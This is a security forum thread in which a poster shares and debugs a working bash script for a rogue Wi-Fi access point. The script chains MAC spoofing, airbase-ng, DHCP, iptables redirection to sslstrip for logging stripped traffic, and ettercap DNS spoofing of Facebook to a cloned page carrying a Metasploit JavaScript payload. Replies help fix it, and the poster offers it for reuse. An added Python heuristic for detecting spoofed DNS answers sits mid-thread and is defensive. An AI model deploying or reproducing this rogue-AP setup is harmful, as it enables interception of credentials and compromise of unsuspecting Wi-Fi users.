
Thread: SoftAP with DNS spoofing. Ettercap kills connectivity?

  1. #1
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    SoftAP with DNS spoofing. Ettercap kills connectivity?

    So I gave up trying to get other people's SoftAP scripts working, and I decided to write my own. I've got the base functionality working near perfectly now, and even added SSLstrip capabilities, but upon expanding further, I've run across a problem that's been giving me migraines. Perhaps someone could help?

    So far everything's working except for Ettercap DNS spoofing. For the proof of concept I'm trying to spoof Facebook to a cloned page with an embedded Metasploit javascript payload.

    After the Ettercap portion of my script runs, I can run nslookup on my laptop and confirm that Facebook has indeed been spoofed to my BT4 box running the script.

    The problem is that even though Facebook gets spoofed, every other webpage fails to load at that point. Ettercap spoofs one page and kills the rest? That can't be right... Any help would be very appreciated.

    Here's the script for those who're interested:
    Code:
    #Cleanup and obfuscation
    killall -9 dhcpd airbase-ng airmon-ng sslstrip tail
    airmon-ng stop wlan0
    airmon-ng stop mon0
    airmon-ng start wlan0
    ifconfig eth0 down
    ifconfig wlan0 down
    ifconfig mon0 down
    macchanger -r eth0
    macchanger -m 00:22:C3:4A:D9:C4 wlan0
    macchanger -m 00:22:C3:4A:D9:C4 mon0
    ifconfig eth0 up
    ifconfig wlan0 up
    ifconfig mon0 up
    #Connects to AP 192.168.1.1 netmask 255.255.255.0 through eth0 with DNS server 192.168.1.1
    ifconfig eth0 192.168.1.109
    route add default gw 192.168.1.1 eth0
    echo nameserver 192.168.1.1 > /etc/resolv.conf
    #Auto creates and configures dhcpd.conf for later settings.
    echo "ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 192.168.2.129;
    range 192.168.2.130 192.168.2.140;
    }" > dhcpd.conf
    #Enable tunneling for later routing
    modprobe tun &
    #Start the access point with BSSID 00:1A:B2:3D:C4:5D and ESSID SoftAP on channel 1 via mon0
    xterm -e airbase-ng -e "SoftAP" -c 6 -v mon0 &
    sleep 8
    #To respond to !ALL! essid probes use: "xterm -e airbase-ng -P -C 15 -e "(ESSID)" -c 1 -v mon0 &" !!ILLEGAL!!
    #Brings up the tap interface created by airbase-ng and assigns it an IP, netmask, and route
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    #Gives dhcpd the permissions it needs
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    #Runs DHCP server for SoftAP
    xterm -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
    sleep 5
    #Enable IP forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #iptables rules
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT #delete if necessary / redundant later
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT #?
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    #Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules!
    iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o at0 -p tcp -m multiport --dports 80,443 --sport 1024:65535
    iptables -A INPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -i at0 -p tcp
    #End of contribution
    #Enables http and https traffic to be redirected to sslstrip on port 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    #Launches sslstrip, listening on port 8080 for redirected packets
    xterm -e /usr/bin/./sslstrip -l 8080 -w /root/sslstrip.log &
    sleep 5
    #Launches a new terminal that will interactively display the contents of sslstrip.log as it grows
    xterm -e tail -f /root/sslstrip.log &
    #Buggy ettercap page redirect
    echo
    echo "Run SET, and make a cloned webpage of facebook with a javascript payload"
    echo
    echo "facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
    echo "*.facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
    echo "www.facebook.com PTR 192.168.2.129" >> /usr/share/ettercap/etter.dns
    read -p "Press any key after a client connects to continue."
    echo "Running ettercap to redirect facebook to 192.168.2.129"
    xterm -e ettercap -i at0 -T -q -P dns_spoof -M arp /192.168.2.129/ /192.168.2.130/ &
    sleep 5
    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    Last edited by AzraelSepultura; 01-05-2011 at 04:17 AM. Reason: Edited to re-enable IP forwarding at end of script, and change ettercap command to include "-M arp" per the discovered fix
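
The client-side check the poster does by hand above (running nslookup and seeing facebook.com answered with the rogue AP's own address) can be turned into a small detection heuristic. The following is an added example, not code from the thread or its author: it parses nslookup-style output and flags answers where a public name resolves to a non-routable address or to the resolver's own address, which is exactly the pattern the etter.dns entries in the script produce. The nslookup text and the list of "local" suffixes are constructed for the example.

```python
import ipaddress
import re

# Constructed sample nslookup output (made up for this example, not captured from
# the thread). The first answer is what a client behind the rogue AP above would
# see: www.facebook.com resolved to the AP's own address, which is also the
# resolver handed out by DHCP. The second answer is an ordinary public result.
SAMPLE_NSLOOKUP = """\
Server:         192.168.2.129
Address:        192.168.2.129#53

Non-authoritative answer:
Name:   www.facebook.com
Address: 192.168.2.129

Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   www.example.com
Address: 93.184.216.34
"""

_SERVER_RE = re.compile(r"^Server:\s+(\S+)")
_NAME_RE = re.compile(r"^Name:\s+(\S+)")
# Answer lines carry a bare address; the resolver's own "Address:" line ends in
# "#53", so anchoring on the end of the line keeps the two apart.
_ANSWER_RE = re.compile(r"^Address:\s+([0-9A-Fa-f.:]+)\s*$")

# Suffixes for which a private answer is expected, not suspicious (assumed list;
# adjust to the names your own network legitimately serves).
LOCAL_SUFFIXES = (".local", ".lan", ".home", ".internal")


def parse_nslookup(text):
    """Return (resolver, name, address) tuples from nslookup-style output."""
    records = []
    server = None
    name = None
    for line in text.splitlines():
        m = _SERVER_RE.match(line)
        if m:
            server, name = m.group(1), None
            continue
        m = _NAME_RE.match(line)
        if m:
            name = m.group(1)
            continue
        m = _ANSWER_RE.match(line)
        if m and name is not None:
            records.append((server, name, m.group(1)))
    return records


def reasons_for(server, name, address):
    """Heuristic checks for one answer; an empty list means nothing odd."""
    reasons = []
    if name.lower().endswith(LOCAL_SUFFIXES):
        return reasons
    ip = ipaddress.ip_address(address)
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        reasons.append("public name resolved to a non-routable address")
    if server is not None and address == server:
        reasons.append("answer is the resolver's own address")
    return reasons


def find_suspicious(text):
    """Return [(name, address, reasons)] for answers that trip a check."""
    findings = []
    for server, name, address in parse_nslookup(text):
        reasons = reasons_for(server, name, address)
        if reasons:
            findings.append((name, address, reasons))
    return findings


if __name__ == "__main__":
    for name, address, reasons in find_suspicious(SAMPLE_NSLOOKUP):
        print(f"{name} -> {address}: {'; '.join(reasons)}")
```

Split-horizon DNS and intranet names served from private ranges will trip the first check, which is why the local-suffix list exists; the second check (answer equals the resolver) has far fewer legitimate causes. Either finding is worth cross-checking against a resolver reached over a path you trust before treating the network as hostile.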

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    This is why it's best to do these things manually so you can troubleshoot if something goes wrong.

    Try doing a dns_spoof with ettercap and see if it works; then you can compare it to what the script does and see what the problem is.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Did you modify the etter.conf file ?
    And can't it be that it's some kind of a forwarding problem? I understand that the only webpage that works is the one you are DNS spoofing. Try spoofing every webpage and see what happens. I have also been playing with these scripts and I couldn't see any webpage until I started DNS spoofing. I saw the webpages but they didn't get redirected to my webpage.
    (my dhcp.conf file and my port forwarding setup were basically the same as yours)

  4. #4
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    I have previously used Ettercap to successfully spoof Facebook on the same laptop that is wirelessly connected to the real AP with eth0 as my "attack box" interface with:

    Code:
    ettercap -i eth0 -T -q -P dns_spoof -M arp /Router IP/ /Laptop IP/
    The real difficulty comes from translating this to my SoftAP interface at0. Including the -M arp switch/argument ends up not spoofing Facebook, and killing all other connectivity, while

    Code:
    ettercap -i at0 -T -q -P dns_spoof /192.168.2.129/ /192.168.2.130/
    does spoof Facebook, but kills all other connectivity. It may be a forwarding issue though... I may be wrong, but I thought that configuring iptables manually would make editing the etter.conf file unnecessary.

  5. #5
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Plenty of mistakes.

    Why do you not just change the ettercap adapter in SET's config and set up a fake AP afterwards?

    #Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules
    Well, I wouldn't if I were you.

    Your script says tcp one too many times. Could look SO MUCH simpler.

    And can't it be that it's somekind of a forwarding problem ?
    The answer to that question is in its following statement.

    I understand that the only webpage that works is the one you are dns spoofing
    6.32 AM right now, and even robots need sleep, so I'll help you out tomorrow.
    Last edited by killadaninja; 01-03-2011 at 08:21 PM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #6
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Thanks a million, Killa. As you can no doubt tell by my clumsy scripting, I am -very- new to this. I'm surprised I've got it working as well as it is. Not entirely sure on how to automate SET into it yet. I'll figure it out eventually, but clearly I've got some bugs to iron out before I proceed to make things more complicated/elegant.

    Also @ LHYX1, I ran my fully working base SoftAP script (No attack addons) and set up ettercap to spoof ALL DNS queries to my SoftAP's IP hosting the cloned Facebook, and as I thought, it worked like a charm using:
    Code:
    ettercap -i at0 -T -q -P dns_spoof -M arp:oneway /192.168.2.130/
    Unfortunately I'm still at square one. Spoofing works, but it kills connectivity in the process. I've played around with the different arguments for -M arp, and tried targeting different IPs with a lot of connections breaking, and no luck.

    The biggest brain-bender for me is this: Using ettercap, you need to arp poison the targets to place yourself "in the middle" for the dns spoofing to work. Understood. My SoftAP interface at0 is already in the middle of the laptop and the real AP that acts as the gateway and DNS server... I can't arp poison across subnets, or arp poison myself. But there's got to be a way to do this, otherwise things like Killa's script and FakeAP_pwn wouldn't exist.

  7. #7
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Problem solved

    Phew. After spending most of the day troubleshooting and manually launching attacks on my real AP, and then on my SoftAP, I finally figured out the discrepancy.

    A before and after
    Code:
    cat /proc/sys/net/ipv4/ip_forward
    revealed that Ettercap was disabling IP forwarding for me. (How nice of it).

    The reason for it is even in the man page, which I did search through, but in my haste overlooked it.

    I guess the only thing to do now is to re-enable it at the end of the script which you are all free and welcome to use provided you append that little "fix" at the end. At last I am free to expand it and make it interactive so to provide for different interface names and whatnot.

    Thanks, everyone for the suggestions!

    tl;dr RTFM.
